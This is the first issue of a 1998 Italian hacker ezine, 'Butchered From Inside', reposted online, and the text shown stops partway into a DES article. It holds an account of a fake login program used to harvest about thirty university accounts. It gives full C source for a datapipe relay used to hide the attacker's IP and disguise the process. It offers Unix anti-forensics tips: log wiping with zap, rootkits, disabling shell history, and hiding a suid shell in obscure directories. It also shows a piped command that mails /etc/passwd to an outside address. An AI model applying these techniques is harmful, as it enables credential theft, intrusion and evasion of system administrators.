Copy Link
Add to Bookmark
Report

BFi numero 01 anno 1

eZine's profile picture
Published in 
Butchered From Inside
 · 22 Aug 2019

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 
°°°°°°°°°°°°°°°°°°°°ÚÄÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄÄ¿°°°°°°°°°°°°°°°°°°°°°
°°°°°°°°°°°°°°°°°°°°³ ³°°°°°°°°°°°°°°°°°°°°°
°°°°°°°°°°°°°°°°°°°°³ J$$$$$$$. $$$$$$$$ $$ ³°°°°°°°°°°°°°°°°°°°°°
°°°°°°°°°°°°°°°°°°°°º $$ J$% d$" d$" º°°°°°°°°°°°°°°°°°°°°°
°°°°°°°°°°°°°°°°°°°°º d$beeee$" .$$eeee .$P º°°°°°°°°°°°°°°°°°°°°°
°°°°°°°°°°°°°°°°°°°°º .$$""""$$. $$"""""
$$" º°°°°°°°°°°°°°°°°°°°°°
°°°°°°°°°°°°°°°°°°°°º d$"
$$ .$P .$P º°°°°°°°°°°°°°°°°°°°°°
°°°°°°°°°°°°°°°°°°°°º .$$$$$$$*" e$- $$ e$ $$ z$-º°°°°°°°°°°°°°°°°°°°°°
°°°°°°°°°°°°°°°°°°°°³ """""""
^" ^"" ^" ^"" ^ ³°°°°°°°°°°°°°°°°°°°°°
°°°°°°°°°°°°°°°°°°°°³ áUTCHERED ŸR0M iNSiDE ³°°°°°°°°°°°°°°°°°°°°°
°°°°°°°°°°°°°°°°°°°°ÀÄÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄÄÙ°°°°°°°°°°°°°°°°°°°°°
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄo0[NUMER0 1] [ANN0 1] [ŸEááRAi0 1998]0oÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄÄÄÄÄÄÄÄÄ iNDiCE ÄÄÄÄÄÄÄÄÄÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
º1þ iNTR0 ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> SMa$teR º
ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹
º1þ HACKiNG: HACKiNG L0CALE C0N C0REL SCRiPT ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> Nefasto º
º2þ HACKiNG: iNTR0DUZi0NE Ai DATAPiPE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> bELFaghorº
º3þ HACKiNG: C0ME NASC0NDERSi DENTR0 UN SiSTEMA UNiX.. ÄÄÄÄÄÄÄÄÄÄÄÄ> pIGpEN º
º4þ HACKiNG: DES ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> |scacco| º
º5þ HACKiNG: CARDiNG iN iTALiA ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> sPIRIT º
º6þ HACKiNG: TiPS'N'TRiCKS ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> DrumFire º
ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹
º1þ PHREAKiNG: PHREAKiNG iN iTALiA ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> PiGPeN º
º2þ PHREAKiNG: RADi0ASC0LT0 PER VERi ASC0LT0Ni ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> Vanadio º
ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹
º1þ ViRii: ViR0PEDiA v1.0 I-II PARTE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> PFloriK º
ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹
º1þ CRACKiNG: NAG SCREEN CHE PASSi0NE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> The_Hawk º
º2þ CRACKiNG: MiNi GUiDA PER SPR0TEGGERE i Gi0CHi.. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> Dr_Slump º
º3þ CRACKiNG: CRACK PER GRAND THEŸT AUT0.. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> PUCK º
ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹
º1þ MiSC: GUiDA ALLA CRiTT0GRAFiA.. I PARTE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> Blinking º
º2þ MiSC: CENNi SULLA MASTERiZZAZi0NE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> Hal9000 º
º3þ MiSC: 0VERCL0CK ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> Zen & Halº
ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹
º1þ SiTi: CRACKiNG NET ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> Cavallo º
ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹
³ ³
³ ³
. .
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄÄÄÄÄÄÄÄÄ iNTR0 ÄÄÄÄÄÄÄÄÄÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Siamo italiani.
Siamo cattivi.
Siamo corrotti.

Non chiederti perche' e' nato questo magazine, la risposta e' in te.
Sarai skazzato come me di sentirti sminuito solo perche' sei italiano..

La scena cambia... Noi vogliamo valorizzare l'Italia nel contesto underground
digitale: ecco nascere Butchered From Inside.
Attraverso questo magazine cercheremo di aiutare a crescere e migliorare
noi e voi, piccoli punti veloci.

Butchered From Inside e' strutturato in varie sezioni, ognuna delle quali
tratta un'"Arte" differente: hacking, phreaking, viriing, cracking.
Non mancheranno inoltre approfondimenti, consigli e recensioni di nuovi siti.

Questo primo numero contiene 16 articoli inediti realizzati dai membri di due
gruppi hp italiani: Orda Delle BadLands e S0ftProjecT.
Siamo solo una piccola parte degli esponenti dell'UnderIta, ovvero
dell'insieme della comunita' cyber che vive l'underground digitale del nostro
Paese.
Dovete aiutarci in questo progetto, mandateci i vostri articoli, riflessioni,
info..
Saremmo felici soprattutto di incontrare la partecipazione di altri gruppi
italiani.
Potete comunicare con noi all'email: bfi98@usa.net

Soffermiamoci brevemente sui contenuti di questo primo numero.

La sezione dedicata all'hacking affronta alcuni argomenti pratici: i datapipe,
i log files dei sistemi UNIX, un semplice modo per guadagnare accessi in
loco. Sono inoltre raccolti alcuni trucchi e suggermienti. Un articolo
spiega il funzionamento dell'algoritmo di crittazione DES. Si parla infine di
carding, ovvero dell'uso e dei metodi per procurarsi numeri di carte di
credito.

La seconda parte di Butchered From Inside contiene informazioni sul phreaking:
un'analisi del phreak in Italia, con alcuni interessanti confronti tra la
situazione del nostro Paese e quella degli USA, ed un'introduzione allo
scanning delle radiofrequenze.

Lo spazio dedicato ai virus e' interamente occupato dalle prime due parti di
Viropedia, una guida alla programmazione virale la cui pubblicazione trovera'
seguito nel prossimo numero.

I crackers ci parlano di come sproteggere i games e in quale modo e' possibile
eliminare i nagscreen dei progs.
Trovate inoltre le istruzioni per crackare il gioco Grand Thieft Auto.

Butchered From Inside si conclude con la prima parte della guida alla
crittografia a chiave pubblica, alcuni consigli sulla masterizzazione,
un'analisi della tecnica dell'Overclocking e la recensione del sito Cracking
Network.

Nel prossimo numero speriamo di poter iniziare la pubblicazione di exploit e
nostri programmi, insieme agli articoli di chi si fara' avanti.
Abbiate pero' presente che Butchered From Inside e' aperiodico, il numero 2
potrebbe essere pubblicato tra 15 giorni o tra due mesi, dipende dalla
quantita' di articoli che scriviamo e che ci inviate. Tenete quindi d'occhio il
sito per le nuove uscite.

Quando avrai iniettato nella tua fibra ottica questa prima dose di Butchered
From Inside, non ne potrai piu' fare a meno...

SMa$teR


ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ÈÍHACKiNGÍÍÍÍÍÄÄÄÄÄÄÄÄÄ HACKiNG L0CALE C0N C0REL SCRiPT ÄÄÄÄÄÄÄÄÄÄÍÍÍÍÍÍÍÍÍÍÍͼ

Tra i tanti modi per ottenere accesso ad un sistema, uno dei piu' semplici ed
efficaci e' quello di prenderlo in loco. Nella mia limitata esperienza di
hackeraggio, il ****** Š stato il luogo che mi ha dato maggiori soddisfazioni.
Appena entrato come studente, un occhio attento e' bastato a vedere l'ignoranza
media dei sistemisti, in particolare quelli del mio dipartimento.
Tralasciamo il fatto che non sanno togliere un virus, configurare una rete di
Windows NT, si preoccupano quando qualcuno osa guardare qualcosa che inizia
per alt. , sono dettagli di scarsa importanza. Il fatto che si adirassero
quando giocavo con i miei compagni a Death Match di Quake, mi turbava un poco.
Vendetta.
Bene, in quel periodo avevo iniziato a dare un'occhiata al COREL 7 e mi aveva
particolarmente interessato COREL SCRIPT, un'applicazione che serve a farsi
programmini compilabili in .exe. Gli esempi offerti dalla COREL sono
interessanti, come il CD-Player, tanto per ricordarne uno. I vantaggi offerti
da questo programma sono una facilita' estrema d'utilizzo, la possibilit… di
creare interfacce grafiche di qualsiasi tipo e una grande scelta di operazioni
possibili.
Dopo poche ore passate a studiare la sintassi di questo linguaggio, il Nefasto
riesce a produrre un programmino del tutto uguale nell'aspetto a quello di
posta elettronica del ****. Il mio scopo, per•, non era quello di uguagliare in
grafica il terminale di posta elettronica di Unix. Mira della mia perfidia era
avere un sacco di accounts nel mio dipartimento. Sostanzialmente, l'utente
lanciava il programma di e-mail, digitava login e pwd, e poi si faceva gli
affari suoi. Invece non era cos.
Lanciava il mio programmino e lui, ignaro, digitava log e pwd che venivano
registrate in un normalissimo file di testo, poi il prog simulava un'attesa
dovuta ad un downtime, peraltro frequenti, e si lanciava il programma vero, gli
passava le informazioni necessarie per il login e puff, l'utente si trovava
dinnanzi al bel terminale senza accorgersi di nulla. Il passaggio di login e
password dal fake al vero non ha creato nessun problema, ho ricreato con
facilita' anche l'effetto shadow sulla password. Alla fine della giornata
passavo a raccogliere gli accounts. Avendo a disposizione una decina di
computer su cui operare, ed essendoci un centinaio di utenti, in quattro giorni
di lavoro ho ottenuto una trentina di accounts. Poi pero', a causa della mia
nomea, il sistema Š stato completamente rinnovato, le pwds sono cambiate, il
mio lavoro Š diventato inutile. Vi prometto il listato del programma (ndr:
sara' pubblicato nel numero due di BFI.), vorrei eseguirlo di nuovo su altri
servers, appena torno dall'esilio e ossidazione del mio computer permettendo.

Nefasto


ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ÈÍHACKiNGÍÍÍÍÍÍÍÍÍÄÄÄÄÄÄÄÄÄ iNTR0DUZi0NE Ai DATAPiPE ÄÄÄÄÄÄÄÄÄÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Per capire il funzionamento di un datapipe bisogna aver prima chiaro il
concetto di pipe: nelle shell un pipe serve per una gestione completa e
corretta dell'input e dell'output, e in particolare permette di passare dati
da un comando all'altro, consentendo quindi di utilizzare l'output di un
programma come input di un altro: un pipe insomma non svolge altro che una
funzione di condotto tra due flussi di dati.
In Unix e sistemi Unix like il pipe nelle shell e' espresso con il carattere
'|'. Facciamo un esempio per chiarire meglio il concetto:
supponiamo di volere mandare il nostro file delle password a un nostro amico,
utilizzando il mail transfer agent di Linuz, mail, anziche' utilizzare un mailer
e fare un file attach; ci bastera' scrivere:

$ more /etc/passwd | mail amico@pirla.com
| | | |
|_ comando per vedere a schermo il contenuto di un file (simile a type
| | | del DOS)
|_ file che vogliamo vedere con il comando more
| |
|_ mail transfer agent
|
|_ indirizzo di posta del nostro amico :)

In questo caso ridirigiamo attraverso il pipe l'output di 'more
/etc/passwd', ovvero il contenuto del passwd, verso il comando mail che lo
utilizzera' come input, in questo caso come corpo del messaggio indirizzato
a amico@pirla.com.
Chiarito il concetto di pipe, passiamo ora al funzionamento di un datapipe.
Innanzitutto bisogna definirlo: un datapipe e' un programma che consente di
ridirigere una connessione verso un determinato server. Possiamo
schematizzare il tutto come segue:

A nostro computer
B server che ospita il datapipe
C server "vittima", ovvero server su cui la connessione viene dirottata

Quindi:
1- A chiama B (a una determinata porta che avrete scelto)
2- B mette in contatto A con C

Sul server C siete quindi loggati con l'IP di B. Il datapipe funzia, come
visto per i pipe, da condotto, da tramite... vediamo ora come sfruttare questa
situazione! :)
Per cominciare, di cosa avete bisogno... allora:

* una shell (che sia in grado di compilare il codice del datapipe :)
* un datapipe (vedete poi! :)

...a questo punto vi chiederete cosa fare... :) beh ora ve lo spiego! :)
Per prima cosa uppate il codice del datapipe sul server B via FTP o forse
meglio con un copia/incolla + cat via telnet! :) ...un altro metodo sicuro
e' farlo via mail...spedite una mail con attach il codice del datapipe alla
vostra shell! :) N.B. se uppate via FTP occhio all'xferlog o wu_ftp.log ! :)
Ora non dovete fare altro che compilare il codice del datapipe e
eseguirlo...:) Solitamente i datapipe richiedo 3 parametri:

1) local port: e' la porta locale, ovvero la porta che utilizzerete
per ridirigere la connessione (sul server B)
2) remote host: e' il server su cui volete ridirigire la connessione
(server C)
3) remote port: e' la porta (del server C) a cui vi collegherete

Vi sono poi datapipe che vi consentono di loggare le connessioni e altre
cosette ...ma a noi non importa, anzi non vogliamo che questo accada! :)
...il codice che allego scarica la connessione sul server C e niente altro...
...insomma, no logging!
Ora che sapete usare un datapipe, vi chiederete: cosa ce ne facciamo?
Semplice, potete utilizzarlo per spoofarvi! Su IRC o su un qualsiasi server
che avrete impostato come server C! :) (il remote host!)...e il vostro IP
"reale", quello che l'ISP vi assegna, se saprete sfruttare adeguatamente il
server B, non verra' loggato da nessuna parte! :) ...sfruttare adeguatamente
il server B, vuol dire non lasciare nessuna traccia nell'history file,
nell'utmp e wtmp eccetera eccetera... :)

Ecco il codice del datapipe da compilare :

}---------------------------------> INIZIO <----------------------------------{

#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <unistd.h>
#include <netdb.h>

#include <linux/time.h>

#undef STRERROR
#ifdef STRERROR
extern char *sys_errlist[];
extern int sys_nerr;
char *undef = "Undefined error";

char *strerror(error)
int error;
{
if (error > sys_nerr)
return undef;
return sys_errlist[error];
}
#endif

main(argc, argv)
int argc;
char **argv;
{
int lsock, csock, osock;
FILE *cfile;
char buf[4096];
struct sockaddr_in laddr, caddr, oaddr;
int caddrlen = sizeof(caddr);
fd_set fdsr, fdse;
struct hostent *h;
struct servent *s;
int nbyt;
unsigned long a;
unsigned short oport;

if (argc != 4) {
fprintf(stderr,"Usage: %s localport remoteport remotehost\n",argv[0]);
return 30;
}
a = inet_addr(argv[3]);
if (!(h = gethostbyname(argv[3])) &&
!(h = gethostbyaddr(&a, 4, AF_INET))) {
perror(argv[3]);
return 25;
}
oport = atol(argv[2]);
laddr.sin_port = htons((unsigned short)(atol(argv[1])));
if ((lsock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
perror("socket");
return 20;
}
laddr.sin_family = htons(AF_INET);
laddr.sin_addr.s_addr = htonl(0);
if (bind(lsock, &laddr, sizeof(laddr))) {
perror("bind");
return 20;
}
if (listen(lsock, 1)) {
perror("listen");
return 20;
}
if ((nbyt = fork()) == -1) {
perror("fork");
return 20;
}
if (nbyt > 0)
return 0;
setsid();
while ((csock = accept(lsock, &caddr, &caddrlen)) != -1) {
cfile = fdopen(csock,"r+");
if ((nbyt = fork()) == -1) {
fprintf(cfile, "500 fork: %s\n", strerror(errno));
shutdown(csock,2);
fclose(cfile);
continue;
}
if (nbyt == 0)
goto gotsock;
fclose(cfile);
while (waitpid(-1, NULL, WNOHANG) > 0);
}
return 20;

gotsock:
if ((osock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
fprintf(cfile, "500 socket: %s\n", strerror(errno));
goto quit1;
}
oaddr.sin_family = h->h_addrtype;
oaddr.sin_port = htons(oport);
memcpy(&oaddr.sin_addr, h->h_addr, h->h_length);
if (connect(osock, &oaddr, sizeof(oaddr))) {
fprintf(cfile, "500 connect: %s\n", strerror(errno));
goto quit1;
}
while (1) {
FD_ZERO(&fdsr);
FD_ZERO(&fdse);
FD_SET(csock,&fdsr);
FD_SET(csock,&fdse);
FD_SET(osock,&fdsr);
FD_SET(osock,&fdse);
if (select(20, &fdsr, NULL, &fdse, NULL) == -1) {
fprintf(cfile, "500 select: %s\n", strerror(errno));
goto quit2;
}
if (FD_ISSET(csock,&fdsr) || FD_ISSET(csock,&fdse)) {
if ((nbyt = read(csock,buf,4096)) <= 0)
goto quit2;
if ((write(osock,buf,nbyt)) <= 0)
goto quit2;
} else if (FD_ISSET(osock,&fdsr) || FD_ISSET(osock,&fdse)) {
if ((nbyt = read(osock,buf,4096)) <= 0)
goto quit2;
if ((write(csock,buf,nbyt)) <= 0)
goto quit2;
}
}

quit2:
shutdown(osock,2);
close(osock);
quit1:
fflush(cfile);
shutdown(csock,2);
quit0:
fclose(cfile);
return 0;
}

}*---------------------------------> FINE <----------------------------------{

Per concludere, un paio di note:
1) ricordatevi che il processo del datapipe puo' esser visto dal system
administrator con un semplice ps -ax; per ovviare a questo problema potete o
utilizzare le tecniche esposte nell'articolo di PiGPeN73 "Come nascondersi
nei sistemi unix"
o forse meglio ancora in aggiunta a queste tecniche,
scrivere uno script o un programmino che se chiamato con dei parametri, che
solo voi saprete, sara' in grado lanciare il datapipe! :) ...e al ps -ax il
sysadm vedra' solo il vostro prg anziche' il datapipe! :)
se poi rinominate il vostro prg con qualche nome del tipo xtern probabilemente
il sysadm non se ne accorgera' nemmeno! :)
2) mettete il datapipe in una directory sperduta, meglio se di un altro
utente (fate voi! :)
3) se utilizzate il datapipe verso piu' server ricordatevi di killare i
processi che non vi servono piu' (solitamente con kill -HUP <idprocesso>)...
...avrete piu' possibilita' di non essere sgamati! :)

In alternativa a tutte queste pallose note potete utilizzare il rootkit (non
per tutti gli os esiste) per nascondere il processo ! :)

Alla prossima... :)

_EOF_
bELFaghor Nocturnus Daem0n


ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ÈÍHACKiNGÍÍÍÄÄÄÄÄÄÄÄ C0ME NASC0NDERSi DENTR0 UN SiSTEMA UNiXÄÄÄÄÄÄÄÄÍÍÍÍÍÍÍÍÍͼ
E ViVERE ŸELiCi E CONTENTi

Autore: PiGPeN

Consumo:
1 Te' Guizza alla pesca
1 confezione di pistacchi
1 coca-cola
1 uovo kinder (con un fottutissimo gnomo come sorpresa, tra l'altro
ne avevo gia' uno uguale :(

Musica ascoltata:
Tampa Florida 12/19/73 (Grateful Dead)
Reckoning (Grateful Dead)


Bene questo articolo ho deciso di scriverlo per rendersi conto di quanti
log ci sono all'interno di un sistema unix e come molte volte e' difficile
controllarli tutti (anche da parte dell'amministratore).

Cominciamo da quelli piu' odiati:

utmp
wtmp
lastlog

Questi tre file sono ben conosciuti da chi si occupa di hacking per il
semplice fatto che all'interno di essi vengono scritti l'ora, il giorno,
la porta da cui e' venuta la connessione e l'ip.

Esempio:

last PiGPeN

PiGPeN ftp localhost Mon Dec 22 18:09 - 18:09 (00:00)
PiGPeN ttyp1 porcile.net Mon Dec 22 18:05 still logged in
PiGPeN ttyp3 pigland.com Mon Dec 22 15:41 - 15:47 (00:06)
PiGPeN tty1 Mon Dec 22 14:57 - down (00:31)
PiGPeN tty1 Mon Dec 22 14:49 - down (00:07)
PiGPeN tty2 Mon Dec 22 14:36 - down (00:11)

Una volta, soprattutto per le versioni come il SunOs, era possibile modificare
questi file da parte di ogni utente, ora invece e' richiesto l'accesso come
root, cio' vuol dire che molto spesso si fa hacking senza essere sicuri al
100% di poter coprire le tracce.
In questi casi, conviene sempre telnettarsi in giro e poi entrarci in modo da
coprire il proprio ip.
Una volta entrato nel sistema, tenta di utilizzare qualche exploit per avere
accesso root, e poi utilizza un programma come zap per rimuovere l'utente dai
file di log.
NON MODIFICARE uno di questi file con un editor, altrimenti lo incasini per
bene, usa un programma apposito!

I programmi come lo zap non coprono tuttavia le tracce completamente, infatti
mentre non siete visibili con comandi come who, i vostri processi possono
essere notati da parte del root.
Infatti con un semplice "ps" l'amministratore si puo' accorgere della vostra
presenza.
Per evitare che questo avvenga ci sono in giro molti rootkit che modificano
tale comando non visualizzando processi indesiderati.

Se non riuscite a coprire le tracce x mancanza dell'accesso root telnettatevi
dalla shell che state usando con lo stesso login, in modo che quando l'utente
si collega non veda scritto il vostro ip, ma localhost e quindi non si
insospettisca piu' di tanto.
Comunque l'user puo' risalire all'ip usando il comando "last nomeutente".

sulog

Questo file logga l'utilizzo del comando "su" che viene usato dagli utenti
per prendere i privilegi come root.
Molti hackers lo evitano, io ritengo che "su" sia un buon modo per cambiare
utente e rimanere nascosto dal comando "who", oltre a non essere loggato
nei files precedenti, con il nuovo utente.
Infatti sulog e' un file costituito soltanto da chi e' passato a root e non
logga quindi se si passa da un user all'altro.

xferlog

questo figlio di puttana logga qualsiasi trasferimento che avviene via ftp,
ecco un esempio:

Mon Dec 22 18:09:30 1997 1 localhost 753 /etc/passwd b _ o r PiGPeN ftp 0 *

La cosa migliore e' evitarlo facendo un cat del file che vi interessa via
telnet, oppure spedendovi i file ad un indirizzo.

Domande e Risposte:

Come posso fare un upload senza essere loggato?

Ci sono vari modi:

1) Spedisci il file all'utente e aspetti che arriva
2) Usi il copia ed incolla di win per esempio in questo modo:
cat > zap <<EOF
**incolli qui
(scrivi: )
EOF
3) Usa un po' di fantasia

Come posso guardare un file senza che il root se ne accorga?

Invece di scrivere cat /etc/passwd
Scrivi cat < /etc/passwd

Se il root fa un bel "ps":

nel primo caso vedra' cat /etc/passwd
nel secondo solo cat

Come posso fare in modo che i miei files restino nel sistema x un bel po'?

Ok rispondo con un esempio: supponiamo che devo nascondere una suid shell
e altre cosette.

(siete nella homedir o in una dir con permesso di scrittura)

Ecco come farei:

mkdir ".. "
cd ".. "

Questa e' una directory difficile da trovare, perche':

1) E' nascosta
2) Gli altri non sanno il numero degli spazi (e probabilmente non sanno
nemmeno che si puo' usare il cd in questo modo :)))

Date ai file nomi non sospettabili (che ne so lettera, relaz ...) cambiate la
data con "touch" e metteteli nascosti!!!
Dopo che ne avete fatto uso crittate tutto!
Se dovete eseguire un comando per esempio il telnet:

Non scrivete: telnet nomesito
e nemmeno: telnet

1) copiate il telnet nella home dir con nome insospettabile
2) scrivete il nome
3) scrivete open nomesito
4) ......

In questo modo si evita che gente idiota, veda quello che state facendo.

Se volete che un file sia difficile da cancellare salvatelo con un trattino
davanti:

-lettera

cosi' l'utente (se e' un idiota) fara':

rm -lettera e il file non verra' cancellato perche' sara' interpretato
come un parametro :)

Dove posso vedere se mi loggano?

- Per cominciare controlla questo file:

/etc/login.defs

- cerca il tuo ip con un grep
- se sei root controlla i cron

Tutto qui?

Beh se non vi basta cominciate a girare su qualche VMS e vedrete cosa vuol
dire vivere una vita loggata!
Il problema e' che c'e' sempre piu' controllo e molti non se ne accorgono
nemmeno: tutto questo va contro il principio della liberta' di informazione e
la definizione di "rete anarchica" :(

pIGpEN

-------------------------------------------------------------------------------

In coerenza con lo stile PiGPeNiano :)

Autore: bELFaghor :)
Consumo: 1 coca~cola
Musica ascoltata: Queen of winter, throned
Vempire or dark faerytales in phallustein (Cradle of filth)

The Queen of death/white winter enthroned
Evil resplendent in dusk red seething skies
Foam/flecked nightmares drag a moon
of draconian design...

Dopo essere entrati in un sistema e' sempre buona regola digitare "unset
HISTFILE"
affinche'il file di history (dove vengono loggati tutti i comandi
che lanceremo sul sistema) venga eliminato non appena lasceremo il server
vittima e per evitare che ne venga scritto uno nuovo conviene linkarlo a
null con il comando "ln -s /dev/null .bash_history" (il file history si
trova solitamente nella dir dell'utente e il prefisso "bash" cambia a
seconda della shell utilizzata; ad esempio se utilizzate la tcsh il file
history sara' .tcsh_history! :)
Un'altra cosa da aggiungere e' che fa' sempre bene controllare le directory
/var/adm e /var/log, non sia mai troviate qualche file di log in piu'! :) E
soprattutto fate un grep di tutti i file cercando il vostro ip! :)

bELFaghor Nocturnus Daem0n


ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ÈÍHACKiNGÍÍÍÍÍÍÍÍÍÄÄÄÄÄÄÄÄ C0ME FUNZi0NA L'ALG0RiTM0 ÄÄÄÄÄÄÄÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
DATA ENCRiPTi0N STANDARD (DES)

Breve introduzione:

L'algoritmo Data Encryption Standard (DES), adottato dal governo
americano nel 1977, e' un blocco di crittazione che trasforma blocchi
di dati a 64 bit in blocchi sotto una chiave di 56 bits tramite
sostituzioni e scambi. E' ufficialmente descritto nel FIPS PUB 46.
L'algoritmo DES e' largamente utilizzato ed e' tutt'ora considerato sicuro
ed affidabile ;).
Vi spieghero' questo algoritmo inquanto viene utilizzato spesso da
